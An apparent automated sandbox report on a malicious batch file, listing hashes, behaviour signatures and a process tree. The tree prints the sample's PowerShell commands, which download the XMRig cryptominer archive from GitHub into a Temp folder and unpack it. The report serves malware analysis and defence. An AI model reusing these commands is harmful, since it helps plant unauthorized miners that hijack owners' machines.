Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
21-12-2024 15:32
Behavioral task
behavioral1
Sample
5DKQH_s.bat
Resource
win7-20241010-en
General
-
Target
5DKQH_s.bat
-
Size
1KB
-
MD5
ccc7afd46efac5aca2f96dc6c6d757b5
-
SHA1
981911ae2cf8c85fd9bbb70ea938105617c2aefd
-
SHA256
35347449c9856b13ee6f4131fc675270c55566881a19cc3d6bc5d2b0709412bb
-
SHA512
1d336a5827812cd871bdb1459536c5052e4cc50bde82d3e5fd7e474a1488bf55a0763f1d2cac7f6569a2ac6334f066a465cb7b74e52ddbb2d23bd2a31e7b3563
Malware Config
Signatures
-
pid Process 2584 powershell.exe 2520 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1980 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2584 powershell.exe 2520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2380 wrote to memory of 2584 2380 cmd.exe 31 PID 2380 wrote to memory of 2584 2380 cmd.exe 31 PID 2380 wrote to memory of 2584 2380 cmd.exe 31 PID 2380 wrote to memory of 1980 2380 cmd.exe 32 PID 2380 wrote to memory of 1980 2380 cmd.exe 32 PID 2380 wrote to memory of 1980 2380 cmd.exe 32 PID 2380 wrote to memory of 2520 2380 cmd.exe 34 PID 2380 wrote to memory of 2520 2380 cmd.exe 34 PID 2380 wrote to memory of 2520 2380 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\5DKQH_s.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
C:\Windows\system32\timeout.exetimeout /t 102⤵
- Delays execution with timeout.exe
PID:1980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD539d4fe92aad984540c02622b74808604
SHA17110ed427b7050e210a883a9ea98da5e12f4cec1
SHA2565a2a8ef2304d8934c27e61c428fc040b5577df57c331a3a3d84cf16a0ab21c95
SHA512c2ec03d1447c9e0ec15e99ada168bcc3853c7c8094862b53ed0e93976af1988cfa889134d091058113e2f4fbaad2b44bf7abcb83209108da866fa4050b7d1cb1